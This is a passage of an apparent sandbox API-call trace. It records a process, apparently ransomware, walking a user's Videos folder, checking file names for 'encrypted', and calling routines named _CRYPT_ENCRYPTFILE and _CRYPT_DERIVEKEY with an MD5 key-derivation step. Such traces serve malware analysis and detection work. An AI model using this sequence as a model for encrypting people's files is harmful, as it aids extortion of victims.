CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="73x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.737] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.737] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.737] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.737] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.738] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.738] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.738] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.738] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c13a20, ftCreationTime.dwHighDateTime=0x1d5b7f0, ftLastAccessTime.dwLowDateTime=0xdc131530, ftLastAccessTime.dwHighDateTime=0x1d5bf98, ftLastWriteTime.dwLowDateTime=0xdc131530, ftLastWriteTime.dwHighDateTime=0x1d5bf98, nFileSizeHigh=0x0, nFileSizeLow=0x12854, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="u373x4noWFcnJ.mp4", cAlternateFileName="U373X4~1.MP4")) returned 0x7c2240 [0043.738] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.738] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.738] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.738] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.738] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.738] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.739] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.739] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.739] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.739] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.739] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.739] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.739] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.739] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.740] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.740] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.740] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.740] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.740] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.741] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.741] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.741] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.741] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.741] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.741] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.741] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.741] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.742] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.742] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.742] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.742] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.742] CharUpperBuffW 